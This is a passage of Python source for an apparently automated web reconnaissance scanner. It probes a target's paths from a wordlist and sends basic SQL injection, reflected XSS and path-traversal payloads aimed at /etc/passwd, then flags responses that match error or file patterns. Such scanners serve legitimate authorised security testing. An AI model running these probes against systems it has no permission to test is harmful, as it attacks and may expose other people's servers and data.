response = requests.head(target, headers=self.headers, timeout=5, allow_redirects=True)
findings["status_code"] = response.status_code
findings["headers"] = dict(response.headers)
logger.info(f"Target {target} is online. Status: {response.status_code}")
except requests.RequestException as e:
logger.error(f"Failed to connect to {target}: {e}")
return {"error": f"Failed to connect to target: {e}"}
# 2. Discover common paths
for path in self.wordlist:
url_to_check = urljoin(target, path)
try:
res = requests.get(url_to_check, headers=self.headers, timeout=3, allow_redirects=False)
if res.status_code >= 200 and res.status_code < 400:
logger.info(f"Found path: {url_to_check} (Status: {res.status_code})")
findings["discovered_paths"].append({
"path": url_to_check,
"status_code": res.status_code
})
except requests.RequestException:
# Ignore connection errors for sub-paths
continue
# 3. Perform basic vulnerability checks
logger.info(f"Performing basic vulnerability checks on {target}")
findings["vulnerabilities"].extend(self._check_sqli(target))
findings["vulnerabilities"].extend(self._check_xss(target))
findings["vulnerabilities"].extend(self._check_lfi(target))
logger.info(f"Web reconnaissance on {target} finished. Found {len(findings['discovered_paths'])} paths and {len(findings['vulnerabilities'])} vulnerabilities.")
return findings
def _check_sqli(self, target: str) -> List[Dict]:
"""Checks for basic SQL Injection vulnerabilities."""
vulnerabilities = []
sqli_payloads = ["'", " or 1=1-- -", " or 1=1#", "\" or 1=1-- -"]
sqli_error_patterns = ["sql syntax", "mysql_fetch_array()", "error in your sql syntax", "warning: mysql", "unclosed quotation mark"]
for param in self.test_parameters:
for payload in sqli_payloads:
test_url = f"{target}?{param}={urlencode({'': payload})}"
try:
response = requests.get(test_url, headers=self.headers, timeout=5)
for error_pattern in sqli_error_patterns:
if error_pattern in response.text.lower():
vulnerabilities.append({
"type": "SQL Injection",
"severity": "High",
"url": test_url,
"parameter": param,
"payload": payload,
"response_snippet": response.text[:200],
"description": f"Potential SQL Injection via parameter '{param}' with payload '{payload}'"
})
logger.warning(f"Potential SQLi found: {test_url}")
# Stop after first finding for this param/type
break
except requests.RequestException:
continue
return vulnerabilities
def _check_xss(self, target: str) -> List[Dict]:
"""Checks for basic Cross-Site Scripting (XSS) vulnerabilities."""
vulnerabilities = []
xss_payloads = [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>"
]
for param in self.test_parameters:
for payload in xss_payloads:
test_url = f"{target}?{param}={urlencode({'': payload})}"
try:
response = requests.get(test_url, headers=self.headers, timeout=5)
if payload.replace('alert(1)', 'alert&#x28;1&#x29;') in response.text or \
payload in response.text: # Check for reflected payload
vulnerabilities.append({
"type": "Cross-Site Scripting (XSS)",
"severity": "Medium",
"url": test_url,
"parameter": param,
"payload": payload,
"response_snippet": response.text[:200],
"description": f"Potential XSS via parameter '{param}' with payload '{payload}'"
})
logger.warning(f"Potential XSS found: {test_url}")
# Stop after first finding for this param/type
break
except requests.RequestException:
continue
return vulnerabilities
def _check_lfi(self, target: str) -> List[Dict]:
"""Checks for basic Local File Inclusion (LFI) vulnerabilities."""
vulnerabilities = []
lfi_payloads = [
"../../../../etc/passwd",
"....//....//....//etc/passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" # URL-encoded
]
lfi_patterns = ["root:x:", "daemon:x:", "bin:x:"] # Common patterns in /etc/passwd
for param in self.test_parameters:
for payload in lfi_payloads:
test_url = f"{target}?{param}={urlencode({'': payload})}"
try:
response = requests.get(test_url, headers=self.headers, timeout=5)
if any(pattern in response.text for pattern in lfi_patterns):
vulnerabilities.append({
"type": "Local File Inclusion (LFI)",
"severity": "High",
"url": test_url,
"parameter": param,
"payload": payload,
"response_snippet": response.text[:200],
"description": f"Potential LFI via parameter '{param}' with payload '{payload}'"
})
logger.warning(f"Potential LFI found: {test_url}")
# Stop after first finding for this param/type
break
except requests.RequestException:
continue
return vulnerabilities